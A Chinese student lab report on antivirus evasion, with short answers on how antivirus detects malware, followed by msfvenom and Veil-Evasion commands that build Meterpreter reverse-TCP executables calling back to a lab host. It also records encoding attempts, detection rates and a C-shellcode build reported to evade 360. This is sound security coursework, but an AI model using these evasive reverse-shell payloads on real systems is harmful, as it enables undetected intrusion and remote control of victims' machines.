20145327 《网络攻防》 免杀原理与实践
1.基础问题回答
(1)杀软是如何检测出恶意代码的?
通过特征码:对已存在的流行代码特征进行比对
通过行为:是否更改注册表行为,是否有设置自启动
(2)免杀是做什么?
防止杀毒软件查杀出来
(3)免杀的基本方法有哪些?
改变特征码:加壳;使用encode等进行编码;使用其他语言进行重写再编译,如veil-evasion。
改变攻击行为:在正常应用软件中插入恶意代码;
自己手动编写一个恶意软件;
2.实践总结与体会
通过这次实验了解了免杀原理,通过不同的方法避开杀毒软件的检测。恶意代码都是伪装的,不会被你轻易发现的,生活中一定要提高自己的网络安全意识呀,定期查杀电脑。
3.离实战还缺些什么技术或步骤?
我们都是固定的ip,实战中不会那么容易让我们成功的,黑客不是那么容易当的。
4.实践过程记录
msfvenom直接生成meterpreter可执行文件
使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.54 PORT=444 -f exe > testcc.exe生成可执行文件然后提交到检测网站进行检测(名字为test20145327时提示包含非法字符)
- 用Virscan检测,大多数软件都能查出病毒
Msfvenom使用编码器生成可执行文件
使用命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00’ LHOST=192.168.43.54 LPORT=444 -f exe > testcc1.exe来生成编码的可执行文件
-
检测
然而没什么作用 -
那就试试多次编译,不信邪 指令加上-i 10即msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00’ LHOST=192.168.43.54 LPORT=444 -f exe > testcc2.exe
-
检测
为什么还提高了,黑人问号.JPG。看来编码这个方法还是不行呀,不能免杀。
Veil-Evasion生成可执行文件
刘老kali里面自带了这个软件,命令行直接输入veil-evasion打开软件
在menu里面输入以下命令来生成可执行文件:
use python/meterpreter/rev_tcp
set LHOST 192.168.43.54
generate
5327-winmine
1
-
成功生成如图
-
检测
这次明显提升了好多,25%Scanner(s) (10/39)found malware!
C语言调用Shellcode
-
使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.54 LPORT=444 -f c生成一个c语言格式的Shellcode数组
-
然后用这个数组来编写一个程序,我用的是win10下的VS2013
-
打开msf监听
-
检测
真是厉害了很多呢 -
获取主机权限
-
用360检测也未检测出
